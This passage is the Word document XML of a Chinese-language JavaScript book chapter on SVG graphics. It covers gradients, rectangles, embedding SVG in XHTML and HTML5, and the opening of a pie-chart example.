      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>defs</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>设置后面要用</w:t>
      </w:r>
      <w:r>
        <w:t>到的一些定义</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>linearGradient id="fade"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>将一种渐变色命名为</w:t>
      </w:r>
      <w:r>
        <w:t>"fade"--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>stop offset="0%"stop-color="#008"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>深蓝</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>stop offset="100%"stop-color="#ccf"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>渐变到浅蓝</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/linearGradient</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/defs</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>画一个具有宽的黑色边框并且渐变色为填充色的矩形</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>rect x="100"y="200"width="800"height="600"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>stroke="black"stroke-width="25"fill="url(#fade)"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/svg</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:t>21-1</w:t>
      </w:r>
      <w:r>
        <w:t>展示了上述代码以图形方式渲染时</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>文件的样子。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>这种语法比较庞大并且有一定的复杂度。它不仅可以用于简单的基本图形的绘制以外，还支持任意曲线、文本以及动画的绘制。</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>图形甚至还能整合</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>脚本和</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式表来添加行为和展示信息。本节将介绍客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码（内嵌在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>中，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>中）如何利用</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>动态绘制图形。会有一些</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>例子展示，但是</w:t>
      </w:r>
      <w:r>
        <w:t>只会牵涉</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>的基本知识。要了解关于</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>的详细内容，可以参阅</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>的标准文档，该文档比较全面地介绍了</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>。这份文档由</w:t>
      </w:r>
      <w:r>
        <w:t>W3C</w:t>
      </w:r>
      <w:r>
        <w:t>负责维护，地址在：</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.w3.org/TR/SVG/</w:t>
      </w:r>
      <w:r>
        <w:t>。要注意的是，文档包含了完整的用于</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>文档的文档对象模型。但是本节使用标准的</w:t>
      </w:r>
      <w:r>
        <w:t>XML DOM</w:t>
      </w:r>
      <w:r>
        <w:t>而非</w:t>
      </w:r>
      <w:r>
        <w:t>SVG DOM</w:t>
      </w:r>
      <w:r>
        <w:t>绘制</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>图形。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>截至撰写本书时，除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>以外的所有主流浏览器都支持</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>IE9</w:t>
      </w:r>
      <w:r>
        <w:t>也将支持）。在最新的浏览器中，可以使用普通的＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素来展示</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>图片。而相对早期的浏览器（比如：</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox3.6</w:t>
      </w:r>
      <w:r>
        <w:t>）还</w:t>
      </w:r>
      <w:r>
        <w:t>不支持</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>，需要使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>object data="sample.svg"type="image/svg+xml"width="100"height="100"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251720704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4067354" cy="3152954"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="61" name="00061.jpeg" descr="000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1.jpeg" descr="00061.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4067354" cy="3152954"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>21-1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　一个简单</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>图形</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞或者＜</w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素展示</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>图形的时候，</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>就变成了另外一种图片格式了，这种方式对于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序员来说是不友好的。更好的方式是直接将</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>图片嵌入到</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中，这样这些图片就可以通过脚本的方式来控制。由于</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>就是一种</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>语法，因此可</w:t>
      </w:r>
      <w:r>
        <w:t>以将它以如下的方式嵌入到</w:t>
      </w:r>
      <w:r>
        <w:t>XHTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>?xml version="1.0"?</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>html xmlns="http://www.w3.org/1999/xhtml"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xmlns:svg="http://www.w3.org/2000/svg"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>声明</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>作为默认的命名空间，以</w:t>
      </w:r>
      <w:r>
        <w:t>"svg:"</w:t>
      </w:r>
      <w:r>
        <w:t>前缀的为</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>的命名空间</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>This is a red square:</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>svg:svg width="10"height="10"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>svg:rect x="0"y="0"width</w:t>
      </w:r>
      <w:r>
        <w:t>="10"height="10"fill="red"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/svg:svg</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>This is a blue circle:</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>svg:svg width="10"height="10"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>svg:circle cx="5"cy="5"r="5"fill="blue"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/svg:svg</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这种展示</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>图形的技术除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>以外的当前浏览器都支持。图</w:t>
      </w:r>
      <w:r>
        <w:t>21-2</w:t>
      </w:r>
      <w:r>
        <w:t>展示了上述</w:t>
      </w:r>
      <w:r>
        <w:t>XHTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档经过</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>渲染之后的图形。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251721728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4058728" cy="1212011"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="62" name="00062.jpeg" descr="0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2.jpeg" descr="00062.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4058728" cy="1212011"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>21-2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　内嵌在</w:t>
      </w:r>
      <w:r>
        <w:t>XHTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中的</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>图形</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的区别进一步缩小，允许</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>（和</w:t>
      </w:r>
      <w:r>
        <w:t>MathML</w:t>
      </w:r>
      <w:r>
        <w:t>）标记直接在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件中使用，不需要命名空间的声明或者标签前缀：</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p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>This is a red square:</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>svg width="10"height="10"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>rect x="0"y="0"width="10"height="10"fill="red"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/svg</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>This is a blue circle:</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">svg </w:t>
      </w:r>
      <w:r>
        <w:t>width="10"height="10"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>circle cx="5"cy="5"r="5"fill="blue"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/svg</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截至撰写本书时，只有最新的浏览器才支持像如上代码那样在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>中直接内嵌</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>就是一种</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>语法，因此画</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>图形其实就相当于是在使用</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>创建相应的</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>元素。例</w:t>
      </w:r>
      <w:r>
        <w:t>21-2</w:t>
      </w:r>
      <w:r>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:t>pieChart()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，该函数用来创建</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>元素，最终渲染成图</w:t>
      </w:r>
      <w:r>
        <w:t>21-3</w:t>
      </w:r>
      <w:r>
        <w:t>所示的饼状图。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251722752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4050101" cy="3088256"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="63" name="00063.jpeg" descr="000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3.jpeg" descr="00063.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4050101" cy="3088256"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>21-3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>绘制而成的</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>饼</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>状图</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>21-2</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>来绘制饼状图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
